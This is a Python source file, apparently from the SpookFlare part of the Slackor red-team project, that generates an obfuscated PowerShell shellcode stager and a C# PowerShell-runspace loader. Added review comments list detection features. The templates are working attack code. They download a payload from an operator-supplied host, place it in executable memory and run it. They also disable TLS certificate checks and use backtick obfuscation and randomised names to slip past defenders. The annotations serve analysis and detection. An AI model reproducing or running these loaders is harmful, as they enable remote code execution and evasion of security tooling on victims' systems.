# -*- coding: utf-8 -*-
# Listing source: github.com/n00py/Slackor@v0.0.0-20200610224921-d007fcea1740/SpookFlare/lib/sfmpps.py
#
# Generator for two text artefacts:
#   * generateMPPSLoader       -> a PowerShell script that downloads bytes over
#     HTTP(S), copies them into executable memory and starts a thread on them.
#   * generateMPPSCsharpLoader -> a C# program that Base64-decodes an embedded
#     PowerShell script and runs it through a System.Management.Automation
#     runspace.
# Identifier names in both artefacts are re-randomised on every call, so the
# stable features for detection are the API calls, constants and HTTP headers
# listed above each template, not variable or class names.
# NOTE(review): this listing was flattened by extraction. Line breaks inside
# the two templates are restored from the gutter numbers; leading whitespace
# inside the templates is not recoverable from the listing.
import random
import string
import base64
from base64 import b64encode


def randomString():
    """Return 12 random ASCII letters (used below as a generated identifier)."""
    # Drawn from the `random` module, so the value differs on every call.
    return ''.join([random.choice(string.ascii_letters) for n in range(12)])


def checksum8(s):
    """Return the sum of the character ordinals of *s*, modulo 256."""
    return sum([ord(ch) for ch in s]) % 0x100


def genHTTPChecksum():
    """Return a 4-character alphanumeric string whose checksum8() equals 92.

    Up to 64 random 3-character prefixes are tried; for each prefix every
    alphanumeric character is tested as the fourth character, in shuffled
    order. If no attempt succeeds the function falls off the end and returns
    None implicitly.
    """
    # NOTE(review): 92 looks like the Metasploit HTTP(S) stager URI checksum
    # for Windows payloads - confirm against the handler in use. For network
    # detection: the download path is 4 alphanumerics whose byte sum is
    # 92 modulo 256.
    chk = string.ascii_letters + string.digits
    for x in range(64):
        # random.sample picks three distinct characters for the prefix.
        uri = "".join(random.sample(chk,3))
        # Sorting on a random key is a shuffle of the candidate alphabet.
        r = "".join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))
        for char in r:
            if checksum8(uri + char) == 92:
                return uri + char


def generateMPPSLoader(mpProto, mpLhost, mpLport, mpArch, mpSsize):
    """Render the PowerShell download-and-run script and return it as text.

    Args:
        mpProto: URL scheme. "https" additionally emits the certificate
            validation override described below.
        mpLhost: Host part of the download URL.
        mpLport: Port part of the download URL; concatenated with ``+``, so
            it must already be a string.
        mpArch: "x86" or "x64". Selects ToInt32/UInt32 or ToInt64/UInt64 for
            the template. Any other value leaves ``mpDef`` unassigned and the
            ``format`` call at the end raises UnboundLocalError.
        mpSsize: Number of leading bytes of the downloaded buffer that the
            rendered script skips before copying the remainder.

    Returns:
        The rendered PowerShell script.
    """
    if mpArch == "x86":
        mpArch = "ToInt32"
        mpDef = "UInt32"
    elif mpArch == "x64":
        mpArch = "ToInt64"
        mpDef = "UInt64"

    if mpProto == "https":
        # The rendered script installs a callback that returns $true for every
        # certificate, so TLS server identity is not checked. ServicePointManager
        # is a static .NET class, so the override is not limited to this request.
        mpPSSSLChk = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
    else:
        mpPSSSLChk = ""

    # Download URL: scheme://host:port/<4-character checksum path>.
    loaderHost = mpProto+"://"+mpLhost+":"+mpLport+"/"+genHTTPChecksum()
    # Template fields: {0}-{3}, {5}, {6} random names; {4} mpSsize;
    # {7} ToInt32/ToInt64; {8} UInt32/UInt64; {9} download URL;
    # {10} TLS override line or empty.
    # Behaviour of the rendered script, as visible in the template:
    #   - Add-Type compiles P/Invoke signatures for kernel32 VirtualAlloc,
    #     CreateThread and WaitForSingleObject (the last is declared but never
    #     called), with -Name "Win32" and namespace Win32Functions.
    #   - Net.WebClient.DownloadData with a fixed User-Agent
    #     "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)",
    #     Accept "*/*" and Accept-Language "en-gb,en;q=0.5".
    #   - VirtualAlloc(0, len, 0x3000, 0x40): MEM_COMMIT|MEM_RESERVE with
    #     PAGE_EXECUTE_READWRITE, i.e. a writable and executable region.
    #   - Marshal.Copy of the downloaded bytes (minus the first {4}) into that
    #     region, then CreateThread with the region as start address.
    #   - Start-Sleep -s 86420 as the final statement; presumably this keeps
    #     the hosting process alive while the thread runs - confirm.
    #   - Cmdlet and type names carry PowerShell backtick escapes, so string
    #     matching on logged script text should strip backticks first.
    # NOTE(review): the listing breaks the last template line after "${5} = "
    # although both halves carry gutter number 42; the original separator byte
    # is not visible here, so the break is reproduced as shown.
    baseMetPs = '''${0} = @"
[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, {8} dwSize, {8} flAllocationType, {8} flProtect);
[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, {8} dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, {8} dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")] public static extern {8} WaitForSingleObject(IntPtr hHandle, {8} dwMilliseconds);
"@;
{10}
${1} = New-Object "`N`et.`W`ebc`l`i`ent";${1}.Headers.Add("User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");${1}.Headers.Add("Accept", "*/*");${1}.Headers.Add("Accept-Language", "en-gb,en;q=0.5");[Byte[]] ${2} = ${1}."D`o`wn`l`oa`d`Data"("{9}");${3} = New-Object byte[] (${2}.Length - {4});[Array]::Copy(${2}, {4}, ${3}, 0, (${2}.Length - {4}));${5} = 
A`d`d-T`y`p`e -memberDefinition ${0} -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;${6}=${5}::VirtualAlloc(0,${3}.Length,0x3000,0x40);[Runtime.InteropServices.Marshal]::Copy(${3}, 0, [IntPtr](${6}.{7}()), ${3}.Length);${5}::CreateThread(0,0,${6},0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0'''

    # Positional arguments follow the field numbering documented above.
    loaderFinal = baseMetPs.format(randomString(), randomString(), randomString(), randomString(), mpSsize, randomString(), randomString(), mpArch, mpDef, loaderHost, mpPSSSLChk)
    return loaderFinal


def generateMPPSCsharpLoader(mpPsCode):
    """Render a C# program that runs *mpPsCode* through a PowerShell runspace.

    Args:
        mpPsCode: PowerShell script text; ``.encode()`` is called on it before
            Base64 encoding.

    Returns:
        The rendered C# source text.
    """
    # Template fields: {0} class name; {1}-{5} local variable names;
    # {6} Base64 of the script. "{{" and "}}" are str.format escapes for
    # literal C# braces.
    # Behaviour of the rendered program, as visible in the template:
    #   - Convert.FromBase64String + Encoding.UTF8.GetString recover the script.
    #   - RunspaceFactory.CreateRunspace / CreatePipeline / AddScript / Invoke
    #     run it inside the program's own process.
    #   - The RunspaceInvoke object {4} is constructed but never used.
    # NOTE(review): because the script is hosted via
    # System.Management.Automation, rules keyed on the powershell.exe process
    # name would presumably not see it; a load of System.Management.Automation
    # by an unexpected process and PowerShell script block logging are the
    # likelier pivots - confirm in the target environment.
    mCsharpCode = '''using System;
using System.IO; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;
public class {0} {{
public static void Main() {{
byte[] {1} = Convert.FromBase64String("{6}");
string {2} = Encoding.UTF8.GetString({1});
Runspace {3} = RunspaceFactory.CreateRunspace();
{3}.Open();
RunspaceInvoke {4} = new RunspaceInvoke({3});
Pipeline {5} = {3}.CreatePipeline();
{5}.Commands.AddScript({2});
{5}.Invoke();
{3}.Close();
return;
}}
}}'''

    loaderFinal = mCsharpCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), b64encode(mpPsCode.encode()))
    return loaderFinal